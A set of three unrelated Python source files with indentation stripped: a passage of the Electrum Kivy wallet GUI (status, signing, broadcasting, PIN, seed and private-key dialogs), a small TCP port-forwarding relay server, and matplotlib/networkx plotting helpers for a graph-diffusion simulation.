self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast_transaction(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
tcp_forwarding_multi_server.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2022, Vm, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.cub@gmail.com>
import time
import socket
import struct
import argparse
import threading
from forwarding import logger, create_tcp_socket_server, create_tcp_socket_client, Forwarding
class TcpForwardingMultiServer(threading.Thread):
def __init__(self, bind_addr):
super().__init__()
self.daemon = True
self._bind_addr = bind_addr
self.alive = True
self._addr_sockserver_map = {}
@staticmethod
def _unpack_verify_data(data):
try:
if not data or len(data) < 35:
return None, ''
# '<UVM>{HOST}{PORT}{UNIQUE_ID}</UVM>'
# TODO check data is legal
uvm_begin, host, port, unique_id, uvm_end = struct.unpack('<5s4si16s6s', data)
if uvm_begin != b'<UVM>' or uvm_end != b'</UVM>':
return None, ''
addr = (socket.inet_ntoa(host), port)
return addr, unique_id.decode('utf-8')
except Exception as e:
return None, ''
def _forwarding_thread(self, sock):
sock.settimeout(10)
sock.setblocking(True)
try:
data = sock.recv(35)
addr, unique_id = self._unpack_verify_data(data)
if not addr:
logger.error('verify failed, {}'.format(data))
sock.close()
return
logger.info('addr: {}, unique_id: {}'.format(addr, unique_id))
addr_str = '{}:{}'.format(addr[0], addr[1])
if addr_str in self._addr_sockserver_map:
client, server = self._addr_sockserver_map[addr_str]
try:
client.close()
except:
pass
try:
server.shutdown(socket.SHUT_RDWR)
server.close()
except:
pass
self._addr_sockserver_map.pop(addr_str, None)
time.sleep(1)
sock_server = create_tcp_socket_server(addr)
if not sock_server:
sock.close()
return
self._addr_sockserver_map[addr_str] = [sock, sock_server]
logger.info('Wait for client connect {}'.format(addr))
sock_in, addr_in = sock_server.accept()
sock_server.close()
self._addr_sockserver_map.pop(addr_str, None)
sock.send(b'<UVM>OK</UVM>')
forward = Forwarding(sock_in, sock)
forward.join()
except Exception as e:
logger.error('forwarding_thread exception, {}'.format(e))
def run(self):
logger.info('TcpForwardingMultiServer({}) Start'.format(self._bind_addr))
sock_server = create_tcp_socket_server(self._bind_addr)
if not sock_server:
logger.info('TcpForwardingMultiServer({}) over'.format(self._bind_addr))
return
while self.alive:
logger.info('Wait for tcp_forwarding_multi_client connect {}'.format(self._bind_addr))
sock_out, addr_out = sock_server.accept()
t = threading.Thread(target=self._forwarding_thread, args=(sock_out,), daemon=True)
t.start()
logger.info('TcpForwardingMultiServer({}) over'.format(self._bind_addr))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--bind_host', type=str, default='0.0.0.0')
parser.add_argument('--bind_port', type=int, default=33333)
args = parser.parse_args()
forwarding = TcpForwardingMultiServer((args.bind_host, args.bind_port))
forwarding.start()
while True:
time.sleep(1)
|
plotter.py
|
import numpy as np
import matplotlib
# Force matplotlib to not use any Xwindows backend.
matplotlib.use('Agg')
from matplotlib import pyplot as plt
from matplotlib import gridspec
from matplotlib import colors
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
import networkx as nx
import multiprocessing as mp
import pickle # used to save data (as class object)
import imageio # Used for making gifs of the network plots
import os # Used for putting the gifs somewhere
from pathlib import Path # used for file path compatibility between operating systems
import time
import utility_funcs
# Single Graph Properties: ------------------------------------------------------------------------------------------
def plot_ave_node_values(graph, individually=False, show=True, save_fig=False, title=None):
"""
Graphs nodes values over the course of a single graph's history.
:param individually: set to True to graph all nodes' values independently
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 4))
plt.plot(graph.nodes[:-1].sum(axis=1) / (graph.nodes.shape[1]))
plt.title(f'Sum Node values as % of possible')
plt.xlabel('Time step')
plt.ylabel(f'Information diffused')
if individually:
plt.plot(graph.nodes[:-1].mean(axis=1))
plt.title(f'Average node values')
plt.xlabel('Time step')
plt.ylabel(f'Average node values')
if save_fig:
plt.savefig(f'Ave_Node_Values {graph.nodes.shape[0]} runs.png')
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
def plot_eff_dist(graph, all_to_all=False, difference=False, fit=False, normalized=True, show=False, save_fig=False, title=None,
source_reward=2.6, delta=1, MPED=False):
"""
:param all_to_all: Determines if the effective distance graphed through time disregards the source, and averages for an all to all effective distance.
:param fit: Allows for linear and averaging interpolations alongside the bare data.
:param normalized: Normalized the y axis if set to True
Parameters only relevant for all_to_all=True effective distance calculations, default highly suppresses higher order paths
:param source_reward:
:param delta:
:param MPED:
"""
assert show or save_fig or title, 'Effective Distance Graph will be neither shown nor saved'
fig = plt.figure(figsize=(12, 6))
if difference:
mean_eff_dist_history = graph.get_eff_dist(all_to_all_eff_dist=all_to_all, overall_average=False, MPED=MPED, source_reward=source_reward, delta=delta)
# mean_eff_dist_history = graph.get_eff_dist(graph.A[-1], multiple_path=MPED, parameter=delta) - graph.get_eff_dist(graph.A[0], multiple_path=MPED, parameter=delta)
elif all_to_all:
mean_eff_dist_history = np.array([graph.evaluate_effective_distances(source_reward=source_reward, parameter=delta, multiple_path_eff_dist=MPED, source=None, timestep=t) for t in range(graph.A.shape[0])])
mean_eff_dist_history = np.mean(np.mean(mean_eff_dist_history, axis=1), axis=1)
# mean_eff_dist_history = np.mean(graph.evaluate_effective_distances(source_reward=source_reward, parameter=delta, multiple_path_eff_dist=MPED, source=None, timestep=-1))
else:
mean_eff_dist_history = np.mean(graph.eff_dist_to_source_history, axis=1)
x = np.array(range(len(mean_eff_dist_history)))
if normalized:
y = np.array(mean_eff_dist_history) / np.amax(mean_eff_dist_history)
else:
y = mean_eff_dist_history
plt.plot(x, y)
if all_to_all:
plt.title(f'All-to-All Effective Distance history')
else:
plt.title(f'Effective Distance history')
plt.xlabel('Time step')
plt.ylabel(f'Effective distance')
if fit:
if fit == 'log':
# log_fit = np.polyfit(np.log(x), y, 1, w=np.sqrt(y))
# plt.plot(x, np.exp(log_fit[1])*np.exp(log_fit[0]*x))
# a, b = optimize.curve_fit(lambda t, a, b: a * np.exp(b * t), x, y, p0=(1, 0.5))
# plt.plot(x, a[0] * np.exp(a[1] * x))
print("Logarithmic/exponential fitting encounters inf/NaN errors in regression :(")
if fit == 'linear':
linear_fit = np.polyfit(x, y, 1, w=np.sqrt(y))
plt.plot(x, linear_fit[0]*x + linear_fit[1])
if fit == 'average':
ave_range = int(len(y)/20)
assert ave_range % 2 == 0, 'Average range must be even (lest, for this algorithm). Default range is ave_range = int(len(y)/20)'
half_range = int((ave_range/2))
averaging_fit = [np.mean(y[index-half_range:index+half_range]) for index in x[half_range:-half_range]]
plt.plot(averaging_fit)
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if save_fig:
plt.savefig(f'Effective_Distance for edge_to_eff_dist_coupling of {graph.edge_conservation_coefficient}.png')
plt.close(fig)
def plot_node_values(graph, node='all', show=False, save_fig=False, title=None):
"""
Plots node values over the course of the graph's run history.
:param node: set to 'all' to graph all node values simultanouesly, else select intended node index (< num_nodes)
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 4))
if node == 'all':
plt.plot(graph.nodes)
plt.title(f'All nodes\' values')
plt.xlabel('Time step')
plt.ylabel(f'Nodes values') # reveals it generally gets all the information!
else:
plt.plot(graph.nodes[:-2, node])
plt.title(f'{node}\'th Node\'s values')
plt.xlabel('Time step')
plt.ylabel(f'{node}th node\'s values') # reveals it generally gets all the information!
if save_fig:
plt.savefig(f'{node} node_values with edge_to_eff_dist_coupling of {np.round(graph.edge_conservation_coefficient, 2)} and {graph.nodes.shape[0]} runs.png')
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if show:
plt.show()
def plot_node_edges(graph, node, show=False, save_fig=False, title=None):
"""
Graphs node's edges values.
:param node: node index whose edges are to be graphed over time.
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 4))
plt.plot(graph.A[:, :, node])
plt.title(f'Node Edges')
plt.xlabel('Timestep')
plt.ylabel(f'{node}th node\'s incoming edge values')
if save_fig:
plt.savefig(f'Edge values of {node} node for {graph.A.shape[0]} runs.png')
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
def plot_edge_sum(graph, node=None, standard_deviation=False, incoming_edges=False, show=False, save_fig=False, title=None):
"""
:param node: index of node to be examined. If None (as default) then edge sums/edge stds, all nodes are plotted.
:param standard_deviation: determines if graphing standard deviations rather than sums
:param incoming_edges: if True, considers incoming rather than outgoing edges, which are by default normalized.
# incoming edge sum only relevant if they are not normalized
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 4))
if standard_deviation:
edge_std_for_all_nodes = np.zeros((graph.num_nodes, graph.A[:, 0, 0].size))
for Node in range(0,
graph.A[0][-1].size): # evaluates standard deviations, Node capitalized to distinguish scope
edge_std_for_all_nodes[Node] = np.std(graph.A[:, Node], axis=1)
# edge_std_for_all_nodes[Node] = [edge_values.std() for edge_values in graph.A[:, Node][:]] # less efficient?
if node or node == 0:
fig = plt.figure(figsize=(10, 4))
plt.plot(edge_std_for_all_nodes[node, :])
plt.title(f'standard deviations, {graph.nodes.shape[0]} runs')
plt.xlabel('Time steps')
plt.ylabel(f'std of {node}th node\'s edges')
if save_fig:
plt.savefig(f'std_of_node_{node}_edges for {graph.nodes.shape[0]} runs.png')
if show:
plt.show()
else:
fig = plt.figure(figsize=(10, 4))
plt.plot(edge_std_for_all_nodes.T)
plt.title(f'Standard Deviations, {graph.nodes.shape[0]} runs')
plt.xlabel('Timestep')
plt.ylabel(f'std of all node edges')
if save_fig:
plt.savefig(f'std_of_all_node_edges with {graph.nodes.shape[0]} runs.png')
if show:
plt.show()
if incoming_edges:
edge_sums = graph.A.sum(axis=1) # returns sums of columns for every timestep
else:
edge_sums = graph.A.sum(axis=2) # returns sums of rows for every timestep
if node or node == 0:
plt.plot(edge_sums[:, node])
if incoming_edges:
plt.plot(edge_sums[node, :])
plt.title(f'sum of node {node} edges')
plt.xlabel('Time steps')
plt.ylabel(f'Sum of {node}th node\'s edges')
if save_fig:
plt.savefig(f'sum of node {node} edges.png')
if show:
plt.show()
else:
plt.plot(edge_sums)
plt.title(f'Sum of every node edges')
plt.xlabel('Time steps')
plt.ylabel(f'Sum of every nodes\' edges')
if save_fig:
plt.savefig(f'sum of every node edges.png')
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
def plot_degree_distribution_var_over_time(graph, show=False, save_fig=False, title=False):
"""
Plots variance of the degree distribution over time.
"""
deg_var_history = [np.var(graph.degree_distribution(timestep=timestep)) for timestep in range(graph.A.shape[0])]
fig = plt.figure(figsize=(10, 4))
plt.plot(deg_var_history)
plt.title(f'Degree Distribution Variance')
plt.xlabel('Timestep')
plt.ylabel(f'Degree Distribution Variance')
if save_fig:
plt.savefig(f'Degree Distribution Variance.png')
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
# NetworkX Observables: ---------------------------------------------------------------------------------------------
def plot_clustering_coefficients(nx_graphs, source=False, average_clustering=False, show=False, save_fig=False, title=None):
"""
Plots clustering Coefficients. Requires a series of pre-converted graphs as NetworkX graphs
:param source: if not None, computes ave_clustering for the single (presumably source) node
"""
if source:
if average_clustering:
clustering_coefficients = [nx.average_clustering(nx_graphs[i], weight='weight', nodes=[source]) for i in range(len(nx_graphs))]
else:
clustering_coefficients = [nx.clustering(nx_graphs[i], weight='weight', nodes=[source])[0] for i in range(len(nx_graphs))]
else:
if average_clustering:
clustering_coefficients = [nx.average_clustering(nx_graphs[i], weight='weight') for i in range(len(nx_graphs))]
else:
clustering_coefficients = np.array([list(nx.clustering(nx_graphs[i], weight='weight').values()) for i in range(len(nx_graphs))])
fig = plt.figure(figsize=(12, 6))
plt.plot(clustering_coefficients)
plt.xlabel('Time steps')
plt.ylabel(f'Clustering Coefficient')
if source and average_clustering or source is 0 and average_clustering:
plt.title(f'Average Clustering Coefficients for node [{source}]')
elif source or source is 0:
plt.title(f'Clustering Coefficients for node [{source}]')
elif average_clustering:
plt.title(f'Average Clustering Coefficients')
else:
plt.title(f'Clustering Coefficients [for all nodes]')
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if save_fig:
plt.savefig(f'Clustering Coefficients.png')
if show:
plt.show()
def plot_ave_neighbor_degree(nx_graphs, source='in', target='in', node=False, show=False, save_fig=False, title=None):
"""
Plots average Neighbor degree. Requires a series of pre-converted graphs as NetworkX graphs
:param source: if not None, computes ave_neighborhood degree for the single (presumably source) node
"""
if node:
ave_neighbor_degree = [list(nx.average_neighbor_degree(nx_graphs[t], nodes=[node], source=source, target=target, weight='weight').values()) for t in range(len(nx_graphs))]
else:
ave_neighbor_degree = [list(nx.average_neighbor_degree(nx_graphs[t], source=source, target=target, weight='weight').values()) for t in range(len(nx_graphs))]
fig = plt.figure(figsize=(12, 6))
plt.plot(ave_neighbor_degree)
plt.xlabel('Time steps')
plt.ylabel(f'Average Neighbor Degree')
if node or node is 0:
plt.title(f'Neighbor Degree for node [{node}], target {target}, source {source}')
else:
plt.title(f'Neighbor Degree [for all nodes], target {target}, source {source}')
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if save_fig:
plt.savefig(f'Neighbor_Degree.png')
if show:
plt.show()
def plot_shortest_path_length(nx_graphs, show=False, save_fig=False, title=None):
"""
Requires fully connected graph (no islands) though could be modified to allow for analysis of disprate components
Plots AVERAGE shortest path lengths. Requires a series of pre-converted graphs as NetworkX graphs
:param nx_graphs: requires pre-converted nx_graphs.
"""
ave_shortest_path_length = [nx.average_shortest_path_length(nx_graphs[t], weight='weight') for t in range(len(nx_graphs))]
fig = plt.figure(figsize=(12, 6))
plt.plot(ave_shortest_path_length)
plt.xlabel('Time steps')
plt.ylabel(f'Average Shortest Path Length')
plt.title(f'Average Shortest Paths')
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if save_fig:
plt.savefig(f'Average_Shortest_Path_Lengths.png')
if show:
plt.show()
# Heatmaps: ---------------------------------------------------------------------------------------------------------
def plot_adjacency_matrix_as_heatmap(graph, timestep=-1, show=False, save_fig=False, title=None):
"""
Returns adjacency matrix at timestep plotted as a heat map. Default timestep is the latest value.
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 10))
plt.imshow(graph.A[timestep], cmap='viridis')
plt.colorbar()
if timestep == -1:
plt.title(f'Adjacency Matrix at final timestep as heat map')
else:
plt.title(f'Adjacency Matrix at timestep {timestep} as heat map')
if save_fig:
plt.savefig(f'Adjacency Matrix heat map at run {timestep}.png')
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
def plot_all_to_all_eff_dists_as_heatmap(graph, timestep=-1, source_reward=2.6, parameter=12, MPED=False, normalize=True, log_norm=False, show=False, save_fig=False, title=None):
"""
Returns all to all effective distances at timestep plotted as a heat map. Default timestep is the latest value.
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 10))
data = graph.evaluate_effective_distances(source_reward=source_reward, parameter=parameter, timestep=timestep, multiple_path_eff_dist=MPED, source=None)
# assert normalize != log_norm, 'cannot both log norm and norm at the same time'
if log_norm:
data = np.log(data)
if normalize:
data /= np.max(data)
plt.imshow(data, cmap='viridis')
plt.colorbar()
if MPED:
ED_type = 'MPED'
else:
ED_type = 'RWED'
if timestep == -1:
plt.title(f'All-to-All {ED_type} at final timestep as heat map')
else:
plt.title(f'All-to-All {ED_type} at timestep {timestep} as heat map')
if save_fig:
plt.savefig(f'All-to-All {ED_type} heat map at run {timestep}.png')
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if show:
plt.show()
def plot_heatmap(TwoD_data, x_range=None, y_range=None, normalize=False, tick_scale=2, title=None, fig_title=None, interp_method=None, show=False):
"""
Generalized heatmap plotter, used for post grid-search plots.
:param TwoD_data: Requires data of the dimensionality of the resultant heatmap (thus 2d)
:param x_range: Full set of x values
:param y_range: Full set of y values
:param normalize: Optional Normalization of heatmap
:param tick_scale: spacing between x/yvalues. (e.g. tick_scale=2 => only half of x/y values are shown as ticks)
:param title: Saves file as title.
:param fig_title: Title displayed in resultant figure .png
"""
if normalize: # though data is automatically normalized in output heatmap.
data = np.array(TwoD_data / np.amax(np.array(TwoD_data)))
else:
data = TwoD_data
if x_range.any(): plt.xticks(x_range)
if y_range.any(): plt.yticks(y_range)
x_interval = (x_range[2]-x_range[1])
y_interval = (y_range[2]-y_range[1])
plt.imshow(data, cmap='viridis', extent=[x_range[0], x_range[-1]+x_interval, y_range[0], y_range[-1]+y_interval], aspect='auto', interpolation=interp_method)
xticks = np.arange(x_range[0], x_range[-1], tick_scale*x_interval)
yticks = np.arange(y_range[0], y_range[-1], tick_scale*y_interval)
plt.xticks(xticks)
plt.yticks(yticks)
plt.colorbar()
plt.xlabel('Selectivity')
plt.ylabel('Edge Conservation')
if show:
plt.show()
if fig_title:
plt.title(f'{fig_title}')
if title:
plt.savefig(f'{title}.png')
plt.close()
# Histograms: -------------------------------------------------------------------------------------------------------
def plot_weight_histogram(graph, num_bins=False, timestep=-1, show=False, save_fig=False, title=None):
"""
Plots histogram for edge weight distribution (edge weight distribution is considered for the entire graph, disconnected from nodes)
:param num_bins: explicitly set the number of bins (bars) for the histogram to use.
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
edges = (graph.A[timestep]).flatten()
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(edges, bins=num_bins)
else:
plt.hist(edges) # bins = auto, as per np.histogram
if timestep == -1:
plt.title(f"Weight histogram for all edges final timestep ({graph.A.shape[0]-1})")
else:
plt.title(f"Weight histogram for all edges timestep: {timestep} ")
if save_fig:
plt.savefig(f'Weight histogram with {num_bins} bins.png')
if show:
plt.show()
def plot_histogram(data, num_bins=False, show=False):
"""
General histogram plotter shortcut; simply input flattened data as data.
:param data: flattened data to be graphed as a histogram.
:param num_bins: If desired, specify the number of bins explicitly.
"""
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(data, bins=num_bins)
else:
plt.hist(data) # bins = auto, as per np.histogram
if show:
plt.show()
def plot_degree_histogram(graph, num_bins=False, timestep=-1, show=False, save_fig=False, title=False):
"""
Plots degree distribution (of entire graph) as a histogram.
:param num_bins: explicit number of bins for histogram, (default sets them automatically)
"""
# nx_graph = graph.convert_to_nx_graph(timestep=timestep)
# degree_dist = [val[1] for val in list(nx_graph.degree(weight='weight'))]
degree_dist = graph.degree_distribution(timestep=timestep)
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(degree_dist, bins=num_bins)
else:
plt.hist(degree_dist) # bins = auto, as per np.histogram
plt.xlabel("Total (outgoing) Edge Weight")
plt.xlabel("Node Count (w/ given edge weight)")
if timestep == -1:
plt.title(f"Degree histogram for all edges final timestep ")
else:
plt.title(f"Degree histogram for all edges timestep: {timestep} ")
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if save_fig:
plt.savefig(f'Degree histogram with {num_bins} bins.png')
if show:
plt.show()
def plot_edge_histogram(graph, num_bins=False, timestep=-1, show=False, save_fig=False, title=False):
"""
Plots degree distribution (of entire graph) as a histogram.
:param num_bins: explicit number of bins for histogram, (default sets them automatically)
"""
edge_degree_dist = graph.A[timestep].flatten()
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(edge_degree_dist, bins=num_bins)
else:
plt.hist(edge_degree_dist) # bins = auto, as per np.histogram
if timestep == -1:
plt.title(f"Edge Degree histogram for all edges final timestep ")
else:
plt.title(f"Edge Degree histogram for all edges timestep: {timestep} ")
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if save_fig:
plt.savefig(f'Edge Degree histogram with {num_bins} bins.png')
if show:
plt.show()
